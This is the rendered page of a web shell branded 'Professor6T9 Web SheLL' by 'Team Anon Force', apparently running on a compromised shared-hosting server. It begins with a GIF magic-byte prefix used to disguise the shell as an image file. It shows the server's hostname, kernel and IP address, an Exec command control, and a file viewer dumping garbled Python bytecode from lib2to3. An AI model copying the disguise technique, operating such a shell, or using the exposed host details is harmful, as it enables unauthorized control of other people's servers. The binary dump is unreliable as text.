GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
proc
/
thread-self
/
root
/
opt
/
alt
/
python312
/
lib64
/
python3.12
/
lib2to3
/
fixes
/
__pycache__
[ HOME ]
Exec
Submit
File Name : fix_funcattrs.cpython-312.opt-1.pyc
� B[Yh� � �J � d Z ddlmZ ddlmZ G d� dej � Zy)z3Fix function attribute names (f.func_x -> f.__x__).� )� fixer_base)�Namec � � e Zd ZdZdZd� Zy)�FixFuncattrsTz� power< any+ trailer< '.' attr=('func_closure' | 'func_doc' | 'func_globals' | 'func_name' | 'func_defaults' | 'func_code' | 'func_dict') > any* > c � � |d d }|j t d|j dd z |j �� � y )N�attr� z__%s__� )�prefix)�replacer �valuer )�self�node�resultsr s �B/opt/alt/python312/lib64/python3.12/lib2to3/fixes/fix_funcattrs.py� transformzFixFuncattrs.transform s; � ��v��q�!�����T�8�d�j�j���n�4�!%���.� /� N)�__name__� __module__�__qualname__� BM_compatible�PATTERNr � r r r r s � ��M��G�/r r N)�__doc__� r � fixer_utilr �BaseFixr r r r �<module>r s"